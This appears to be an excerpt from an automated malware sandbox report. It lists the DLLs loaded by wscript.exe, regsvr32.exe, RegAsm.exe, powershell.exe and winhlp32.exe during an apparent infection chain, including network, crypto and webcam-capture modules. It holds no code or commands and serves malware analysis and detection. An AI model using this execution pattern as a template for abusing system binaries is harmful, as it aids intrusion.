        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msdart.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptnet.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: devenum.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msdmo.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: avicap32.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: zipfldr.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.fileexplorer.common.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
        Source: C:\Windows\winhlp32.exeSection loaded: winmm.dll
        Source: C:\Windows\winhlp32.exeSection loaded: urlmon.dll
        Source: C:\Windows\winhlp32.exeSection loaded: wininet.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iertutil.dll
        Source: C:\Windows\winhlp32.exeSection loaded: srvcli.dll
        Source: C:\Windows\winhlp32.exeSection loaded: netutils.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\winhlp32.exeSection loaded: rstrtmgr.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ncrypt.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ntasn1.dll
        Source: C:\Windows\winhlp32.exeSection loaded: sspicli.dll
        Source: C:\Windows\winhlp32.exeSection loaded: mswsock.dll
        Source: C:\Windows\winhlp32.exeSection loaded: windows.storage.dll
        Source: C:\Windows\winhlp32.exeSection loaded: wldp.dll
        Source: C:\Windows\winhlp32.exeSection loaded: profapi.dll
        Source: C:\Windows\winhlp32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\winhlp32.exeSection loaded: winhttp.dll
        Source: C:\Windows\winhlp32.exeSection loaded: winnsi.dll
        Source: C:\Windows\winhlp32.exeSection loaded: dnsapi.dll
        Source: C:\Windows\winhlp32.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\winhlp32.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
        Source: C:\Windows\winhlp32.exeSection loaded: winmm.dll
        Source: C:\Windows\winhlp32.exeSection loaded: urlmon.dll
        Source: C:\Windows\winhlp32.exeSection loaded: wininet.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iertutil.dll
        Source: C:\Windows\winhlp32.exeSection loaded: srvcli.dll
        Source: C:\Windows\winhlp32.exeSection loaded: netutils.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\winhlp32.exeSection loaded: rstrtmgr.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ncrypt.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ntasn1.dll
